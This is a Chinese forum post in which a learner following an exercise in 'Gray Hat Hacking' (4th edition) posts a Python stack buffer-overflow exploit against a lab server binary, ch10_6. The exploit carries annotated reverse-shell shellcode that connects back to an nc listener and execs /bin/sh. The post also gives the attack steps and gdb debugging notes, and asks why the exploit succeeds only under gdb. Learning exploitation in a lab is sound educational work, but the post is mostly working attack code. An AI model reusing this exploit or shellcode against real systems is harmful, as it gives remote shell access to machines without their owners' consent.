《灰帽黑客(第4版)》,233页,10.4.5验证漏洞攻击,我的代码如下:
//[COLOR="Red"][B]A端 terminal_1[/B][/COLOR]
// exploit.py
#!/usr/bin/python
import socket
total = 1024
off = 264
[COLOR="Blue"][B]sc = ""
sc += "\x31\xc0" #xor %eax,%eax
sc += "\x31\xdb" #xor %ebx,%ebx
sc += "\x31\xd2" #xor %edx,%edx
sc += "\x50" #push %eax
sc += "\x6a\x01" #push $0x1
sc += "\x6a\x02" #push $0x2
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\xfe\xc3" #inc %bl
sc += "\xb0\x66" #mov $0x66,%al
sc += "\xcd\x80" #int $0x80
sc += "\x89\xc6" #mov %eax,%esi
sc += "\x52" #push %edx
sc += "\x68\x65\x66\x67\x67" #push $0x67676665
sc += "\x66\x68\xbb\xbb" #pushw $0xbbbb
sc += "\x31\xc9" #xor %ecx,%ecx
sc += "\xb1\x02" #mov $0x2,%cl
sc += "\x66\x51" #push %cx
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\x6a\x10" #push $0x10
sc += "\x51" #push %ecx
sc += "\x56" #push %esi
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\xb3\x03" #mov $0x3,%bl
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x66" #mov $0x66,%al
sc += "\xcd\x80" #int $0x80
sc += "\x89\xf3" #mov %esi,%ebx
sc += "\x31\xc9" #xor %ecx,%ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x41" #inc %ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x41" #inc %ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x3f" #mov $0x3f,%al
sc += "\xcd\x80" #int $0x80
sc += "\x52" #push %edx
sc += "\x68\x2f\x2f\x73\x68" #push $0x68732f2f
sc += "\x68\x2f\x62\x69\x6e" #push $0x6e69622f
sc += "\x89\xe3" #mov %esp,%ebx
sc += "\x52" #push %edx
sc += "\x53" #push %ebx
sc += "\x89\xe1" #mov %esp,%ecx
sc += "\x31\xc0" #xor %eax,%eax
sc += "\xb0\x0b" #mov $0xb,%al
sc += "\xcd\x80" #int $0x80[/B][/COLOR]
noplen = 32
jmp = "\x18\xf2\xff\xbf"
s = socket.socket()
s.connect(("localhost", 5555))
print s.recv(1024)
exploit = ""
exploit += "A"*off + jmp + "\x90"*noplen + sc
exploit += "C"*(total-off-4-len(sc)-noplen)
s.send(exploit)
s.close
//[COLOR="Red"][B]B端 terminal_1[/B][/COLOR]
> ./ch10_6
//[COLOR="Red"][B]B端 terminal_2[/B][/COLOR]
> ./nc -nlvv 48059
注:
1、A端为被攻击对象,上面存放 exploit.py,运行后会反向连接 B端的 terminal_1,
即连接至 ch10_6 的 5555端口
2、exploit.py会利用缓冲区溢出漏洞跳转至 sc代码(蓝色部分),该代码会连接至 B端 terminal_2
,即 nc-nlvv 48059
3、最终,在B端 terminal_2 处获得shell,在该处的任何shell指令都可获得 A端 相应的信息
调试过程 1:
1、在B端打开2个terminal:
B_terminal_1 > ./ch10_6
B_terminal_2 > nc-nlvv 48059
2、在A端打开1个terminal
A_terminal_1 > ./exploit.py
结果:
无论在B端terminal_2里输入什么都没任何A端信息输出([COLOR="Red"][B]失败[/B][/COLOR])
调试过程 2:
1、在B端打开2个terminal:
B_terminal_1 > gdb -q ch10_6
> [COLOR="Blue"][B]set follow-fork-mode child[/B][/COLOR]
> run
B_terminal_2 > nc-nlvv 48059
2、在A端打开1个terminal
A_terminal_1 > ./exploit.py
结果:
B端terminal_2里输入任何shell指令都可获得相应的A端信息([COLOR="Red"][B]成功[/B][/COLOR])
可见,问题出在直接运行 ch10_6 上面。如何才能在不用gdb的情况下达到 “set follow-fork-mode child” 的效果?
补充:
1、exploit.py中的sc代码(蓝色部分),我并没有直接使用书10.4.5上面的代码,而是使用之前书上
第7章里的反向连接代码(有部分修改)。但是这不影响的。
2、附上 ch10_6 的程序如下:
ch10_6.zip
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
